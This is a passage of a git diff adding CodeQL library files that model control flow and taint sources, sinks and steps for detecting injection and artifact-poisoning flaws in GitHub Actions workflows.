getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + class WorkflowScope extends CfgScope instanceof Workflow { } + + class CompositeActionScope extends CfgScope instanceof CompositeAction { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. + private newtype TUnit = Unit() + + additional class SplitKindBase = TUnit; + + additional class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + additional int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) + } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) + } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = this.(CompositeAction).getAnInput() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } +} + +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { + override ControlFlowTree getChildNode(int i) { + if this instanceof ReusableWorkflow + then + result = + rank[i](AstNode child, Location l | + ( + child = this.(ReusableWorkflow).getAnInput() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](AstNode child, Location l | + ( + child = super.getStrategy() or + child = super.getAJob() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + child = super.getAnOutputExpr() and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class StrategyTree extends StandardPreOrderTree instanceof Strategy { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + child = super.getAMatrixVarExpr() and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class JobTree extends StandardPreOrderTree instanceof LocalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ExternalJobTree extends StandardPreOrderTree instanceof ExternalJob { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getArgumentExpr(_) or + child = super.getInScopeEnvVarExpr(_) or + child = super.getOutputs() or + child = super.getStrategy() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesStep { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunTree extends StandardPreOrderTree instanceof Run { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](AstNode child, Location l | + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScript() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class ScalarValueTree extends StandardPreOrderTree instanceof ScalarValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getAChildNode() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputTree extends LeafTree instanceof Input { } + +private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } + +private class ExpressionLeaf extends LeafTree instanceof Expression { } diff --git a/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 000000000000..2914dac5f0a6 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -0,0 +1,131 @@ +private import actions +private import internal.ExternalFlowExtensions as Extensions +private import codeql.actions.DataFlow +private import codeql.actions.security.ArtifactPoisoningQuery + +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - provenance: verification of the model + */ +predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) +} + +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + * - provenance: verification of the model + */ +predicate actionsSummaryModel( + string action, string version, string input, string output, string kind, string provenance +) { + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) +} + +/** + * MaD sinks + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input: sink node (prefixed with either `env.` or `input.`) + * - kind: sink kind + * - provenance: verification of the model + */ +predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +) { + Extensions::actionsSinkModel(action, version, input, kind, provenance) +} + +/** + * Holds if source.fieldName is a MaD-defined source of a given taint kind. + */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | + actionsSourceModel(action, version, fieldName, kind, _) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) + else + if fieldName.trim().matches("output.%") + then source.asExpr() = uses + else none() + ) + ) +} + +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Uses uses, string action, string version, string input, string output | + actionsSummaryModel(action, version, input, output, "taint", _) and + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and + uses.getCallee() = action.toLowerCase() and + // version check + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + exists(UntrustedArtifactDownloadStep download | + pred.asExpr() = download and + download.getAFollowingStep() = uses + ) + ) and + succ.asExpr() = uses + ) +} + +/** + * Holds if sink is a MaD-defined sink for a given taint kind. + */ +predicate madSink(DataFlow::Node sink, string kind) { + exists(Uses uses, string action, string version, string input | + actionsSinkModel(action, version, input, kind, _) and + uses.getCallee() = action.toLowerCase() and + // version check + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + // pred provenance + ( + input.trim().matches("env.%") and + sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) + or + input.trim() = "artifact" and + sink.asExpr() = uses + ) + ) +} diff --git a/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll new file mode 100644 index 000000000000..df3d513d0050 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -0,0 +1,366 @@ +private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery +private import codeql.actions.config.Config +private import codeql.actions.dataflow.ExternalFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + /** Gets the event that triggered the source. */ + abstract string getEventName(); + + override string getThreatModel() { result = "remote" } +} + +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ +class GitHubCtxSource extends RemoteFlowSource { + string flag; + string event; + GitHubExpression e; + + GitHubCtxSource() { + this.asExpr() = e and + // github.head_ref + e.getFieldName() = "head_ref" and + flag = "branch" and + ( + event = e.getATriggerEvent().getName() and + event = "pull_request_target" + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) + } + + override string getSourceType() { result = flag } + + override string getEventName() { result = event } +} + +class GitHubEventCtxSource extends RemoteFlowSource { + string flag; + string context; + string event; + + GitHubEventCtxSource() { + exists(Expression e, string regexp | + this.asExpr() = e and + context = e.getExpression() and + ( + // the context is available for the job trigger events + event = e.getATriggerEvent().getName() and + exists(string context_prefix | + contextTriggerDataModel(event, context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) and + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + normalizeExpr(context).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + string getContext() { result = context } + + override string getEventName() { result = event } +} + +abstract class CommandSource extends RemoteFlowSource { + abstract string getCommand(); + + abstract Run getEnclosingRun(); + + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } +} + +class GitCommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GitCommandSource() { + exists(Step checkout, string cmd_regex | + checkout instanceof SimplePRHeadCheckoutStep and + this.asExpr() = run.getScript() and + checkout.getAFollowingStep() = run and + run.getScript().getAStmt() = cmd and + cmd.indexOf("git") = 0 and + untrustedGitCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GhCLICommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GhCLICommandSource() { + exists(string cmd_regex | + this.asExpr() = run.getScript() and + run.getScript().getAStmt() = cmd and + cmd.indexOf("gh ") = 0 and + untrustedGhCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") and + ( + cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") and + run.getATriggerEvent().getName() = checkoutTriggers() + or + not cmd.regexpMatch(".*\\b(pr|pulls)\\b.*") + ) + ) + } + + override string getSourceType() { result = flag } + + override Run getEnclosingRun() { result = run } + + override string getCommand() { result = cmd } +} + +class GitHubEventPathSource extends RemoteFlowSource, CommandSource { + string cmd; + string flag; + string access_path; + Run run; + + // Examples + // COMMENT_AUTHOR=$(jq -r .comment.user.login "$GITHUB_EVENT_PATH") + // CURRENT_COMMENT=$(jq -r .comment.body "$GITHUB_EVENT_PATH") + // PR_HEAD=$(jq --raw-output .pull_request.head.ref ${GITHUB_EVENT_PATH}) + // PR_NUMBER=$(jq --raw-output .pull_request.number ${GITHUB_EVENT_PATH}) + // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) + // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') + GitHubEventPathSource() { + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and + cmd.matches("jq%") and + cmd.matches("%GITHUB_EVENT_PATH%") and + exists(string regexp | + untrustedEventPropertiesDataModel(regexp, flag) and + not flag = "json" and + access_path = "github.event" + cmd.regexpCapture(".*\\s+([^\\s]+)\\s+.*", 1) and + normalizeExpr(access_path).regexpMatch("(?i)\\s*" + wrapRegexp(regexp) + ".*") + ) + } + + override string getSourceType() { result = flag } + + override string getCommand() { result = cmd } + + override Run getEnclosingRun() { result = run } +} + +class GitHubEventJsonSource extends RemoteFlowSource { + string flag; + string event; + + GitHubEventJsonSource() { + exists(Expression e, string context, string regexp | + this.asExpr() = e and + context = e.getExpression() and + untrustedEventPropertiesDataModel(regexp, _) and + ( + // only contexts for the triggering events are considered tainted. + // eg: for `pull_request`, we only consider `github.event.pull_request` + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + exists(string context_prefix | + contextTriggerDataModel(event, context_prefix) and + normalizeExpr(context).matches("%" + context_prefix + "%") + ) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") + or + // github.event is tainted for all triggers + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and + normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp("\\bgithub.event\\b") + ".*") + or + not exists(e.getATriggerEvent()) and + event = "unknown" + ) and + flag = "json" + ) + } + + override string getSourceType() { result = flag } + + override string getEventName() { result = event } +} + +/** + * A Source of untrusted data defined in a MaD specification + */ +class MaDSource extends RemoteFlowSource { + string sourceType; + + MaDSource() { madSource(this, sourceType, _) } + + override string getSourceType() { result = sourceType } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +abstract class FileSource extends RemoteFlowSource { } + +/** + * A downloaded artifact. + */ +class ArtifactSource extends RemoteFlowSource, FileSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } + + override string getSourceType() { result = "artifact" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A file from an untrusted checkout. + */ +private class CheckoutSource extends RemoteFlowSource, FileSource { + CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by dorny/paths-filter. + */ +class DornyPathsFilterSource extends RemoteFlowSource { + DornyPathsFilterSource() { + exists(UsesStep u | + u.getCallee() = "dorny/paths-filter" and + u.getArgument("list-files") = ["csv", "json"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by tj-actions/changed-files. + */ +class TJActionsChangedFilesSource extends RemoteFlowSource { + TJActionsChangedFilesSource() { + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and + u.getCallee() = "tj-actions/changed-files" and + u.getCallee() = vulnerable_action and + ( + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +/** + * A list of file names returned by tj-actions/verify-changed-files. + */ +class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { + TJActionsVerifyChangedFilesSource() { + exists(UsesStep u, string vulnerable_action, string vulnerable_version, string vulnerable_sha | + vulnerableActionsDataModel(vulnerable_action, vulnerable_version, vulnerable_sha, _) and + u.getCallee() = "tj-actions/verify-changed-files" and + u.getCallee() = vulnerable_action and + ( + u.getArgument("safe_output") = "false" + or + (u.getVersion() = vulnerable_version or u.getVersion() = vulnerable_sha) + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "filename" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class Xt0rtedSlashCommandSource extends RemoteFlowSource { + Xt0rtedSlashCommandSource() { + exists(UsesStep u | + u.getCallee() = "xt0rted/slash-command-action" and + u.getArgument("permission-level").toLowerCase() = ["read", "none"] and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { + ZenteredIssueFormBodyParserSource() { + exists(UsesStep u | + u.getCallee() = "zentered/issue-forms-body-parser" and + not exists(u.getArgument("body")) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} + +class OctokitRequestActionSource extends RemoteFlowSource { + OctokitRequestActionSource() { + exists(UsesStep u, string route | + u.getCallee() = "octokit/request-action" and + route = u.getArgument("route").trim() and + route.indexOf("GET") = 0 and + ( + route.matches("%/commits%") or + route.matches("%/comments%") or + route.matches("%/pulls%") or + route.matches("%/issues%") or + route.matches("%/users%") or + route.matches("%github.event.issue.pull_request.url%") + ) and + this.asExpr() = u + ) + } + + override string getSourceType() { result = "text" } + + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } +} diff --git a/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 000000000000..0f7e906685b1 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -0,0 +1,92 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "::set-output name=step-output::$BODY" + */ +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string var, string field | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run and + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) + ) +} + +predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists( + Run run, string var, string field //string key, string value | + | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + // we store the taint on the enclosing job since the may not exist an implicit env attribute + succ.asExpr() = run.getEnclosingJob() and + run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) + ) +} + +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_OUTPUT" + * - run: | + * foo=$(> "$GITHUB_OUTPUT" + */ +predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + run.getScript().getAFileReadCommand() = cmd + ) + ) and + run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScript() and + succ.asExpr() = run + ) +} + +/** + * A command whose output gets assigned to an environment variable or step output. + * - run: | + * echo "foo=$(cmd)" >> "$GITHUB_ENV" + * - run: | + * foo=$(> "$GITHUB_ENV" + */ +predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + run.getScript().getAFileReadCommand() = cmd + ) + ) and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getScript() and + // we store the taint on the enclosing job since there may not be an implicit env attribute + succ.asExpr() = run.getEnclosingJob() + ) +} diff --git a/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll new file mode 100644 index 000000000000..56e2c75123c0 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -0,0 +1,156 @@ +/** + * Provides classes representing various flow steps for taint tracking. + */ + +private import actions +private import codeql.util.Unit +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources + +/** + * A unit class for adding additional taint steps. + * + * Extend this class to add additional taint steps that should apply to all + * taint configurations. + */ +class AdditionalTaintStep extends Unit { + /** + * Holds if the step from `node1` to `node2` should be considered a taint + * step for all configurations. + */ + abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); +} + +/** + * A file source step followed by a Run step may read the file. + */ +predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(FileSource source, Run run | + pred = source and + source.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) + ) +} + +/** + * A read of the _files field of the dorny/paths-filter action. + */ +predicate dornyPathsFilterTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof DornyPathsFilterSource and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName().matches("%_files") and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/changed-files action. + */ +predicate tjActionsChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = + [ + "added_files", "copied_files", "deleted_files", "modified_files", "renamed_files", + "all_old_new_renamed_files", "type_changed_files", "unmerged_files", "unknown_files", + "all_changed_and_modified_files", "all_changed_files", "other_changed_files", + "all_modified_files", "other_modified_files", "other_deleted_files", "modified_keys", + "changed_keys" + ] and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the tj-actions/verify-changed-files action. + */ +predicate tjActionsVerifyChangedFilesTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof TJActionsVerifyChangedFilesSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "changed_files" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the xt0rted/slash-command-action action. + */ +predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof Xt0rtedSlashCommandSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + o.getFieldName() = "command-arguments" and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the zentered/issue-forms-body-parser action. + */ +predicate zenteredIssueFormBodyParserSource(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof ZenteredIssueFormBodyParserSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") + ) and + succ.asExpr() = o + ) +} + +/** + * A read of user-controlled field of the octokit/request-action action. + */ +predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(StepsExpression o | + pred instanceof OctokitRequestActionSource and + o.getTarget() = pred.asExpr() and + o.getStepId() = pred.asExpr().(UsesStep).getId() and + succ.asExpr() = o and + ( + not o instanceof JsonReferenceExpression and + o.getFieldName() = "data" + or + o instanceof JsonReferenceExpression and + o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and + o.(JsonReferenceExpression) + .getAccessPath() + .matches([ + "%.title", + "%.user.login", + "%.body", + "%.head.ref", + "%.head.repo.full_name", + "%.commit.author.email", + "%.commit.commiter.email", + "%.commit.message", + "%.email", + "%.name", + ]) + ) + ) +} + +class TaintSteps extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { + dornyPathsFilterTaintStep(node1, node2) or + tjActionsChangedFilesTaintStep(node1, node2) or + tjActionsVerifyChangedFilesTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + xt0rtedSlashCommandActionTaintStep(node1, node2) or + zenteredIssueFormBodyParserSource(node1, node2) or + octokitRequestActionTaintStep(node1, node2) + } +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll new file mode 100644 index 000000000000..2e3c13f164c2 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -0,0 +1,15 @@ +/** + * Provides Actions-specific definitions for use in the data flow library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll + */ + +private import codeql.dataflow.DataFlow +private import codeql.Locations + +module ActionsDataFlow implements InputSig { + import DataFlowPrivate as Private + import DataFlowPublic + import Private + + predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1; +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll new file mode 100644 index 000000000000..cf95292588c3 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -0,0 +1,403 @@ +private import codeql.util.Unit +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps +private import codeql.actions.dataflow.FlowSources + +class DataFlowSecondLevelScope = Unit; + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +/** + * Not implemented + */ +class CastNode extends Node { + CastNode() { none() } +} + +/** + * Not implemented + */ +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { + p.isParameterOf(c, pos) +} + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { + this.getAstNode() instanceof Job or + this.getAstNode() instanceof Expression or + this.getAstNode() instanceof Uses or + this.getAstNode() instanceof Run or + this.getAstNode() instanceof Outputs or + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue + } +} + +/** + * A call corresponds to a Uses steps where a composite action or a reusable 